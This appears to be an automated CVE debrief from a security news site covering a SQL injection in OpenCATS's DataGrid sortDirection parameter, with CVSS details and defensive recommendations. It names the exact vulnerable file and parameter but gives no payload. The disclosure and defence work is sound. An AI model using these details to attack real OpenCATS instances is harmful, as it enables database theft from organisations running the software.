PatchSiren

PatchSiren cyber security CVE debrief

CVE-2026-49489 OpenCATS CVE debrief

OpenCATS through version 0.9.7.4 contains a SQL injection vulnerability in the DataGrid component's sortDirection parameter. The flaw exists in ajax/getDataGridPager.php, where authenticated attackers can inject malicious SQL to conduct time-based blind injection attacks and extract database contents. The vulnerability requires authentication but can be exploited remotely with low attack complexity.

Vendor
OpenCATS
Product
Unknown
CVSS
HIGH 8.4
CISA KEV
Not listed in stored evidence
Original CVE published
2026-05-31
Original CVE updated
2026-05-31
Advisory published
2026-05-31
Advisory updated
2026-05-31

Who should care

Organizations running OpenCATS applicant tracking system versions through 0.9.7.4, particularly those with externally accessible instances or large user bases where credential compromise risk is elevated. Security teams responsible for web application security and database protection should prioritize assessment.

Technical summary

The vulnerability resides in ajax/getDataGridPager.php where the sortDirection parameter fails to properly sanitize user input before incorporating it into SQL queries. Authenticated attackers can manipulate this parameter to inject arbitrary SQL, enabling time-based blind injection techniques to exfiltrate database contents. The CVSS 4.0 score of 8.4 (HIGH) reflects significant confidentiality impact to the vulnerable component and subsequent systems, with limited availability impact. No integrity impact to the vulnerable component is indicated, though subsequent systems show high confidentiality impact.

Defensive priority

HIGH

Recommended defensive actions

  • Apply patches from the OpenCATS project when available, prioritizing the GitHub Security Advisory GHSA-8mc8-5gw6-c7w4
  • Restrict network access to OpenCATS instances to authorized users and trusted networks
  • Monitor web application logs for anomalous SQL patterns in ajax/getDataGridPager.php sortDirection parameter
  • Implement parameterized queries or prepared statements for all database interactions in custom DataGrid implementations
  • Review database user permissions to enforce least privilege, limiting impact of successful injection
  • Consider web application firewall (WAF) rules to detect and block SQL injection attempts against sortDirection parameters

Evidence notes

CVE published 2026-05-31. CVSS 4.0 vector: AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:L/SC:H/SI:N/SA:L. CWE-89 (SQL Injection). Vendor attribution marked low-confidence with 'Unknown Vendor' in source; Packetstorm referenced as domain candidate. Multiple advisory sources confirm issue including GitHub Security Advisory, VulnCheck, and Exploit-DB.

Official resources

2026-05-31